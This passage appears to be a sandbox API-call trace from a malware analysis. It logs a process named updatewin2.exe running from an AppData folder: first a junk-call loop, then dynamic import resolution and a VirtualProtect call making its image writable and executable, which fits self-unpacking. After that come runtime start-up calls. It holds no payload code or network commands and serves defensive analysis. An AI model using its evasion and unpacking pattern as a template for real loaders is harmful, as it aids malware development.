lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.620] AddAtomA (lpString=0x0) returned 0x0 [0080.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.620] AddAtomA (lpString=0x0) returned 0x0 [0080.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.620] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.620] AddAtomA (lpString=0x0) returned 0x0 [0080.620] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.621] AddAtomA (lpString=0x0) returned 0x0 [0080.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.621] AddAtomA (lpString=0x0) returned 0x0 [0080.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.621] AddAtomA (lpString=0x0) returned 0x0 [0080.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.621] AddAtomA (lpString=0x0) returned 0x0 [0080.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.621] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.621] AddAtomA (lpString=0x0) returned 0x0 [0080.621] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.622] AddAtomA (lpString=0x0) returned 0x0 [0080.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.622] AddAtomA (lpString=0x0) returned 0x0 [0080.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.622] AddAtomA (lpString=0x0) returned 0x0 [0080.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.622] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.622] AddAtomA (lpString=0x0) returned 0x0 [0080.622] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.623] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.623] AddAtomA (lpString=0x0) returned 0x0 [0080.623] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.623] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.623] AddAtomA (lpString=0x0) returned 0x0 [0080.623] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.623] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.623] AddAtomA (lpString=0x0) returned 0x0 [0080.623] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.623] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.623] AddAtomA (lpString=0x0) returned 0x0 [0080.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.624] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.624] AddAtomA (lpString=0x0) returned 0x0 [0080.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.624] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.624] AddAtomA (lpString=0x0) returned 0x0 [0080.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.624] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.624] AddAtomA (lpString=0x0) returned 0x0 [0080.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.624] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.624] AddAtomA (lpString=0x0) returned 0x0 [0080.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.625] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.625] AddAtomA (lpString=0x0) returned 0x0 [0080.625] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.625] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0081.175] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0081.176] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0081.176] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0081.176] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0081.176] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0081.176] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0081.177] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0081.177] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0081.177] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0081.177] SetErrorMode (uMode=0x400) returned 0x0 [0081.177] SetErrorMode (uMode=0x0) returned 0x400 [0081.177] GetVersionExA (in: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0081.177] VirtualAlloc (lpAddress=0x0, dwSize=0x2d800, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0081.182] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5f0 | out: lpflOldProtect=0x18f5f0*=0x2) returned 1 [0081.352] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.353] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0081.353] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0081.353] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSize") returned 0x76e2196e [0081.353] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointer") returned 0x76e217d1 [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0081.354] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0081.355] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0081.356] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeSListHead") returned 0x773594a4 [0081.356] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0081.356] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0081.356] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0081.356] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0081.356] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0081.356] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0081.356] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0081.356] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0081.356] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0081.356] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0081.357] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0081.357] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0081.357] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0081.357] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0081.357] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0081.357] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0081.357] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0081.357] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0081.357] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0081.357] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0081.358] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0081.358] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0081.358] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0081.358] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0081.358] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0081.358] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0081.358] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0081.358] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0081.358] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0081.358] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileExW") returned 0x76e31811 [0081.358] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0081.359] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0081.359] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0081.359] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0081.359] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineA") returned 0x76e251a1 [0081.359] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0081.359] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0081.359] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0081.359] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxA") returned 0x767efd1e [0081.359] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0081.359] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0081.360] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0081.360] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0081.360] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74390000 [0081.506] GetProcAddress (hModule=0x74390000, lpProcName="atexit") returned 0x743ac544 [0081.506] atexit (param_1=0x5963d8) returned 0 [0081.507] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5f4 | out: lpSystemTimeAsFileTime=0x18f5f4*(dwLowDateTime=0x9ca8a120, dwHighDateTime=0x1d5d6b4)) [0081.507] GetCurrentThreadId () returned 0x5e0 [0081.507] GetCurrentProcessId () returned 0x65c [0081.507] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5ec | out: lpPerformanceCount=0x18f5ec*=22194828466) returned 1 [0081.516] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0081.517] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.517] GetLastError () returned 0x57 [0081.518] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.518] GetLastError () returned 0x57 [0081.518] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0081.518] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0081.518] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.518] GetLastError () returned 0x57 [0081.519] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0081.519] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0081.521] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.521] GetLastError () returned 0x57 [0081.521] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.521] GetLastError () returned 0x57 [0081.521] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0081.521] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0081.521] GetProcessHeap () returned 0x580000 [0081.521] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.521] GetLastError () returned 0x57 [0081.522] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0081.522] GetLastError () returned 0x57 [0081.522] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0081.522] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x364) returned 0x5aad00 [0081.523] SetLastError (dwErrCode=0x57) [0081.523] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xc00) returned 0x5ab070 [0081.525] GetStartupInfoW (in: lpStartupInfo=0x18f528 | out: lpStartupInfo=0x18f528*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033e0, hStdOutput=0xb7ceee93, hStdError=0xfffffffe)) [0081.525] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0081.525] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0081.525] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0081.525] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe\" " [0081.525] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe\" " [0081.525] IsValidCodePage (CodePage=0x4e4) returned 1 [0081.525] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f548 | out: lpCPInfo=0x18f548) returned 1 [0081.525] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ee10 | out: lpCPInfo=0x18ee10) returned 1 [0081.525] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.525] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eba8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0081.525] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x18ee24 | out: lpCharType=0x18ee24) returned 1 [0081.526] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.526] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0081.526] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.526] GetLastError () returned 0x57 [0081.526] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0081.527] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0081.527] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e948, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0081.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f324, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿK@\x97·`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0081.527] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.527] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0081.527] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" 